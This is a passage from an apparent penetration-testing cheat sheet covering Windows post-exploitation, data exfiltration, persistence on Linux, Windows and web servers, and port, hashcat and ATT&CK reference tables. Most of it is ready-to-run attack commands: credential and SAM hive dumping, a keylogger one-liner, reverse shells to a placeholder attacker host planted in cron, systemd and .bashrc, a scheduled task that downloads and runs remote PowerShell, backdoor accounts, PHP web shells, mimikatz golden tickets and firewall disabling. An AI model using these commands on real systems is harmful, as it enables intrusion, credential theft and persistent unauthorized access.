11.4 Windows Post-Exploitation
# System info
systeminfo
ipconfig /all
route print
arp -a
netstat -ano
net user /domain
net group "Domain Admins" /domain
# Credential files
dir /s /b C:\*.config C:\*.cfg C:\*.ini C:\*.txt 2>nul | findstr /i password
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
cmdkey /list
# PowerShell
Get-Content (Get-PSReadlineOption).HistorySavePath
Get-ChildItem -Path C:\ -Include *.txt,*.ini,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"
# SAM/SYSTEM backup
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SECURITY C:\temp\SECURITY
11.5 Data Collection & Exfil
import -window root screenshot.png
python3 -c "from pynput.keyboard import Listener; Listener(on_press=lambda k: open('/tmp/.keys','a').write(str(k))).start()"
mysqldump -u root -p<PASS> --all-databases > dump.sql
pg_dump -U <USER> <DB> > dump.sql
sqlite3 db.sqlite .dump > dump.sql
tar czf /tmp/exfil.tar.gz /path/to/data
zip -r /tmp/exfil.zip /path/to/data
12. PERSISTENCE
12.1 Linux Persistence
SSH Keys
mkdir -p ~/.ssh
echo '<YOUR_PUBLIC_KEY>' >> ~/.ssh/authorized_keys
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys
Cron Jobs
(crontab -l 2>/dev/null; echo "*/5 * * * * bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1") | crontab -
echo "*/5 * * * * root bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1" >> /etc/crontab
Backdoor User
useradd -m -s /bin/bash -G sudo hacker
echo 'hacker:password123' | chpasswd
echo 'hacker:$(openssl passwd -1 password123):0:0::/root:/bin/bash' >> /etc/passwd
SUID Backdoor
cp /bin/bash /tmp/.backdoor
chmod u+s /tmp/.backdoor
Systemd Service
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable backdoor.service
systemctl start backdoor.service
.bashrc / .profile
echo 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 &' >> ~/.bashrc
echo 'nohup bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 &' >> ~/.profile
PAM Backdoor
LD_PRELOAD
echo '/tmp/evil.so' >> /etc/ld.so.preload
12.2 Windows Persistence
Registry Run Keys
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\temp\shell.exe" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\temp\shell.exe" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Backdoor /t REG_SZ /d "C:\temp\shell.exe" /f
Scheduled Tasks
schtasks /create /tn "Backdoor" /tr "C:\temp\shell.exe" /sc minute /mo 5 /ru System
schtasks /create /tn "Backdoor" /tr "powershell -ep bypass -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://<LHOST>/shell.ps1')" /sc onlogon /ru System
New Admin User
net user backdoor Password123! /add
net localgroup Administrators backdoor /add
net localgroup "Remote Desktop Users" backdoor /add
WMI Event Subscription
$FilterArgs = @{name='Backdoor'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}
$Filter = New-CimInstance -ClassName __EventFilter -Namespace "root\subscription" -Property $FilterArgs
$ConsumerArgs = @{name='Backdoor'; CommandLineTemplate="C:\temp\shell.exe"}
$Consumer = New-CimInstance -ClassName CommandLineEventConsumer -Namespace "root\subscription" -Property $ConsumerArgs
$BindingArgs = @{Filter=[Ref]$Filter; Consumer=[Ref]$Consumer}
New-CimInstance -ClassName __FilterToConsumerBinding -Namespace "root\subscription" -Property $BindingArgs
Service Backdoor
sc create Backdoor binpath= "C:\temp\shell.exe" start= auto
sc start Backdoor
DLL Hijacking Persistence
# Find a service that loads a missing DLL
# Place malicious DLL in the search path
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f dll -o evil.dll
copy evil.dll "C:\path\to\hijackable\location\missing.dll"
Startup Folder
copy shell.exe "C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
copy shell.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"
RDP Backdoor (Sticky Keys)
# Replace sethc.exe with cmd.exe
takeown /f C:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant administrators:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe /y
# Now press Shift 5 times at login screen for SYSTEM cmd
Skeleton Key (Domain Persistence)
mimikatz # misc::skeleton
# Now "mimikatz" works as password for any domain user
DCSync Persistence (AD)
Add-DomainObjectAcl -TargetIdentity "DC=<DOMAIN>,DC=<TLD>" -PrincipalIdentity <USER> -Rights DCSync
Golden Ticket (AD)
# With krbtgt hash, create tickets indefinitely
mimikatz # kerberos::golden /user:Administrator /domain:<DOMAIN> /sid:<SID> /krbtgt:<HASH> /ticket:golden.kirbi
12.3 Web Persistence
Web Shell
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/.shell.php
echo '<?php if(md5($_GET["k"])=="<MD5_OF_KEY>"){system($_GET["cmd"]);} ?>' > /var/www/html/.hidden.php
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f aspx -o /inetpub/wwwroot/.shell.aspx
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f raw -o /path/to/webapps/ROOT/.shell.jsp
.htaccess Backdoor
echo 'AddType application/x-httpd-php .evil' > /var/www/html/uploads/.htaccess
APPENDIX: QUICK REFERENCE TABLES
Common Ports
| Port |
Service |
Notes |
| 21 |
FTP |
Check anon login |
| 22 |
SSH |
Brute force, key auth |
| 23 |
Telnet |
Cleartext |
| 25 |
SMTP |
User enum, relay |
| 53 |
DNS |
Zone transfer |
| 80 |
HTTP |
Web attacks |
| 88 |
Kerberos |
AD attacks |
| 110 |
POP3 |
Email |
| 111 |
RPCbind |
NFS |
| 135 |
MSRPC |
Windows RPC |
| 139 |
NetBIOS |
SMB |
| 143 |
IMAP |
Email |
| 161 |
SNMP |
Community strings |
| 389 |
LDAP |
AD enum |
| 443 |
HTTPS |
Web attacks |
| 445 |
SMB |
Shares, EternalBlue |
| 636 |
LDAPS |
AD enum |
| 1433 |
MSSQL |
xp_cmdshell |
| 1521 |
Oracle |
TNS |
| 2049 |
NFS |
Mount shares |
| 3306 |
MySQL |
UDF, file read |
| 3389 |
RDP |
Remote desktop |
| 5432 |
PostgreSQL |
COPY FROM PROGRAM |
| 5900 |
VNC |
Screen sharing |
| 5985 |
WinRM |
Evil-WinRM |
| 6379 |
Redis |
Unauth access |
| 8080 |
HTTP-Alt |
Web attacks |
| 8443 |
HTTPS-Alt |
Web attacks |
| 27017 |
MongoDB |
NoSQL |
Hashcat Mode Reference
| Mode |
Hash Type |
| 0 |
MD5 |
| 100 |
SHA1 |
| 500 |
md5crypt |
| 1000 |
NTLM |
| 1400 |
SHA256 |
| 1800 |
sha512crypt |
| 3200 |
bcrypt |
| 5500 |
NetNTLMv1 |
| 5600 |
NetNTLMv2 |
| 7500 |
Kerberos 5 AS-REQ |
| 13100 |
Kerberos 5 TGS-REP |
| 18200 |
Kerberos 5 AS-REP |
| 22000 |
WPA-PBKDF2 |
MITRE ATT&CK Quick Map
| Phase |
Technique ID |
Name |
| Recon |
T1595 |
Active Scanning |
| Recon |
T1592 |
Gather Victim Host Info |
| Initial Access |
T1190 |
Exploit Public-Facing App |
| Initial Access |
T1078 |
Valid Accounts |
| Execution |
T1059 |
Command & Scripting |
| Persistence |
T1053 |
Scheduled Task/Job |
| Persistence |
T1547 |
Boot/Logon Autostart |
| Persistence |
T1136 |
Create Account |
| Priv Esc |
T1068 |
Exploitation for Priv Esc |
| Priv Esc |
T1055 |
Process Injection |
| Defense Evasion |
T1070 |
Indicator Removal |
| Credential Access |
T1003 |
OS Credential Dumping |
| Credential Access |
T1558 |
Steal/Forge Kerberos Tickets |
| Lateral Movement |
T1021 |
Remote Services |
| Lateral Movement |
T1550 |
Use Alternate Auth Material |
| Collection |
T1005 |
Data from Local System |
| Exfiltration |
T1041 |
Exfil Over C2 Channel |
Firewall Rules (Quick Disable)
iptables -F
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
netsh advfirewall set allprofiles state off
netsh firewall set opmode mode=DISABLE
Compilation Quick Reference
gcc exploit.c -o exploit
gcc -m32 exploit.c -o exploit32
gcc -m32 -Wl,--hash-style=both exploit.c -o exploit
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
gcc -shared -fPIC -o evil.so evil.c
gcc -shared -fPIC -nostartfiles -o evil.so evil.c
pyinstaller --onefile script.py
CIPHER - Compiled under authorized penetration testing assumption.
Use responsibly. Unauthorized access to computer systems is illegal.